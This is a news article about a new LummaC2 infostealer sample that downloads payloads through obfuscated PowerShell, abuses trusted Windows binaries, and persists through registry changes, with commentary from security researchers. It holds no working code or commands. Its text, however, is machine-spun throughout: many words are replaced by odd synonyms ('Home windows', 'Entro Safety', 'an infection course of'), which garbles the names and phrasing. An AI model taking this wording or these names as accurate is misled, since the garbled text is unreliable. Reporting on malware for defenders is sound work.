LummaC2 infostealer makes use of obfuscated scripts by way of PowerShell to focus on endpoints – Cyber Tech
A brand new pattern of the LummaC2 infostealer was noticed utilizing a collection of PowerShell instructions that downloaded and executed a payload on a focused endpoint.
In a latest weblog publish, researchers at Ontinue described LummaC2 as an information-stealing malware written within the C programming language that’s designed to steal delicate info.
The researchers mentioned the malware was noticed getting used as malware-as-a-service (MaaS), and was seen on Russian-speaking boards beginning in 2022. The malware infects the goal host and goals to steal info from the endpoint after which exfiltrate it to the C2 server.
“The important thing takeaway from our evaluation is a reinforcement of the significance of monitoring and mitigating obfuscated scripts, notably these delivered by way of PowerShell,” mentioned Rhys Downing cyber defender at Ontinue. “Whereas using obfuscated PowerShell instructions shouldn’t be new, it stays a extremely efficient method for attackers. Safety groups ought to prioritize enhancing their detection and response capabilities round such techniques, making certain that even well-known strategies are repeatedly scrutinized and blocked.”
Why safety execs ought to take note of LummaC2’s resurgence
LummaC2’s resurgence highlights vital dangers due to its subtle use of PowerShell and “living-off-the-land” binaries already obtainable inside an surroundings, making it more durable to detect and mitigate, mentioned Jason Soroko, senior fellow at Sectigo.
Not like typical PowerShell-based malware, Soroko mentioned LummaC2 combines obfuscation, trusted Home windows binaries (Mshta.exe and Dllhost.exe), and persistence methods by way of registry modifications to evade defenses and preserve long-term management.
“The vital takeaway is the malware’s superior multi-stage an infection course of and talent to take advantage of reputable system instruments, which requires heightened vigilance and proactive protection methods from safety groups,” mentioned Soroko. “Whereas PowerShell instructions are generally exploited, LummaC2’s mixture of techniques presents a singular and tougher risk.”
Itzik Alvas, co-founder and CEO at Entro Safety, added that the LummaC2 infostealer lets attackers compromise credentials of human and non-human identities (NHIs) on contaminated techniques. Alvas mentioned whereas the preliminary scope of assault is commonly comparatively benign and most industries have standardized IAM and governance controls in place to restrict dangers related to compromised human credentials, NHIs are sometimes created and used with extreme permissions.
“Because of this, compromised NHIs enable attackers on an contaminated system to covertly assault the whole group from inside,” mentioned Alvas.